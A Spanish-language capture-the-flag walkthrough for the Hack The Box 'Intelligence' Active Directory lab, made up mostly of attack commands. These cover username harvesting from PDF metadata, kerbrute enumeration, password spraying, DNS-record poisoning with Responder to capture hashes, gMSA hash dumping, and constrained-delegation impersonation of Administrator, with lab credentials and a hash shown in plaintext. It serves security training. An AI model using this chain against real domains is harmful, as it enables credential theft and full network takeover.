Intelligence - HackMD

# Intelligence ~~~ ping -c 1 10.10.10.248 ~~~ ![](https://i.imgur.com/XlhiQJV.png) ~~~ nmap -sS --min-rate 5000 -n -Pn 10.10.10.248 -oG allPorts ~~~ ![](https://i.imgur.com/30d03ZM.png) ``` ┌─[root@cr4y0-PC]─[/home/cr4y0/Desktop/HackTheBox/INTELLIGENCE] └──╼ #nmap -sCV -sS --min-rate 5000 -n -Pn -p53,80,88,135,139,389,445,464,593,636,3268,3269 10.10.10.248 -oN targeted Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 22:07 -05 Nmap scan report for 10.10.10.248 Host is up (0.19s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Intelligence | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-04 15:07:25Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 |_ssl-date: 2022-04-04T15:08:50+00:00; +12h00m02s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 |_ssl-date: 2022-04-04T15:08:48+00:00; +12h00m02s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2022-04-04T15:08:50+00:00; +12h00m02s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2022-04-04T15:08:48+00:00; +12h00m02s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 12h00m01s, deviation: 0s, median: 12h00m01s | smb2-time: | date: 2022-04-04T15:08:11 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required ``` ~~~ whatweb http://10.10.10.248/ ~~~ ![](https://i.imgur.com/PUT52xl.png) ~~~ ┌─[root@cr4y0-PC]─[/home/cr4y0/Desktop/HackTheBox/INTELLIGENCE] └──╼ #echo "10.10.10.248 intelligence.htb" >> /etc/hosts ~~~ ~~~ crackmapexec smb 10.10.10.248 ~~~ ![](https://i.imgur.com/DTTRxJ7.png) ~~~ smbclient -L \\\\10.10.10.248\\ -N smbmap -H 10.10.10.248 smbmap -H 10.10.10.248 -u 'asdad' ~~~ ![](https://i.imgur.com/QPvTdT9.png) Para el puerto 389 podemos usar ldapsearch o ldapdomaindump con credenciales válidas. ## Web ![](https://i.imgur.com/fIZYyjm.png) ~~~ for i in {2020..2022}; do for j in {01..12}; do for k in {01..31}; do echo "http://10.10.10.248/documents/$i-$j-$k-upload.pdf"; done; done; done | xargs -n 1 -P 20 wget ~~~ ![](https://i.imgur.com/0aw2n54.png) ``` exiftool 2020-01-01-upload.pdf exiftool 2020-01-01-upload.pdf -creator ``` ![](https://i.imgur.com/C5kgbaV.png) ~~~ exiftool *.pdf | grep "Creator" | awk 'NF{print $NF}' ~~~ ![](https://i.imgur.com/aLa7fUL.png) ~~~ exiftool *.pdf | grep "Creator" | awk 'NF{print $NF}' | sort -u > users.txt ~~~ ~~~ git clone "https://github.com/ropnop/kerbrute" cd kerbrute/ go build . go build -ldflags "-s -w" . ~~~ ~~~ /opt/kerbrute/kerbrute userenum --dc 10.10.10.248 -d intelligence.htb users.txt ~~~ ![](https://i.imgur.com/LdL4VvD.png) ~~~ python3 /opt/impacket/examples/GetNPUsers.py intelligence.htb/ -no-pass -usersfile users.txt ~~~ ![](https://i.imgur.com/tlAykqZ.png) Instalamos una herramienta llamada `pdftotext` que transforma el contenido del pdf a texto: ``` pdftotext 2020-01-01-upload.pdf ``` ![](https://i.imgur.com/zC7fY7a.png) ~~~ for i in $(ls); do pdftotext $i;done ~~~ ![](https://i.imgur.com/iZY0lDr.png) ~~~ cat *.txt | grep -iE "pass|user" -C 3 ~~~ ![](https://i.imgur.com/8p1wQ9L.png) ~~~ NewIntelligenceCorpUser9876 ~~~ ~~~ crackmapexec smb 10.10.10.248 -u users.txt -p 'NewIntelligenceCorpUser9876' ~~~ ![](https://i.imgur.com/SU5xpqV.png) ~~~ GetUserSPNs.py intelligence.htb/Tiffany.Molina:NewIntelligenceCorpUser9876 ~~~ ![](https://i.imgur.com/nlK6ilX.png) ``` ldapdomaindump -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' 10.10.10.248 service apache2 start ``` ![](https://i.imgur.com/bvBZ3r9.png) Ahora vemos TRUSTED_TO_AUTH_FOR_DELEGATION, si fuesemos svc_int podriamos tratar de impersonar a un usuario: ![](https://i.imgur.com/MuBgat6.png) ~~~ smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -R ~~~ ![](https://i.imgur.com/M9iIO21.png) ~~~ smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --download 'Users\Tiffany.Molina\Desktop\user.txt' ~~~ ![](https://i.imgur.com/R99MAXL.png) ![](https://i.imgur.com/e3M54nP.png) ~~~ smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -r IT ~~~ ![](https://i.imgur.com/MF0Daif.png) ~~~ smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --download 'IT/downdetector.ps1' ~~~ ![](https://i.imgur.com/qFTjR0U.png) ![](https://i.imgur.com/UyND01Q.png) ~~~ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -r webcr4y0 -a add -t A -d 10.10.14.17 10.10.10.248 ~~~ ![](https://i.imgur.com/5tpz6WK.png) ~~~ Responder -I tun0 ~~~ ![](https://i.imgur.com/qhygeQ6.png) ![](https://i.imgur.com/xtrrsdG.png) ![](https://i.imgur.com/IAAqVEZ.png) ~~~ bloodhound-python -c All -u 'Ted.Graves' -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb ~~~ ![](https://i.imgur.com/wNIqMOV.png) ![](https://i.imgur.com/EnHbTa5.png) ~~~ python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb ~~~ ![](https://i.imgur.com/R9cqV4P.png) `svc_int$:::a5fd76c71109b0b483abe309fbc92ccb` ![](https://i.imgur.com/VkpP4KO.png) ~~~ python3 pywerview.py get-netcomputer -u 'Ted.Graves' -t 10.10.10.248 --full-data ~~~ ![](https://i.imgur.com/qacjPdh.png) ![](https://i.imgur.com/t5DoDEz.png) `WWW/dc.intelligence.htb` ~~~ python3 /opt/impacket/examples/getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :a5fd76c71109b0b483abe309fbc92ccb ~~~ ![](https://i.imgur.com/UeH5Zw9.png) ![](https://i.imgur.com/KiacR7K.png) ~~~ python3 /opt/impacket/examples/wmiexec.py dc.intelligence.htb -k -no-pass ~~~ ![](https://i.imgur.com/1LkUgzM.png)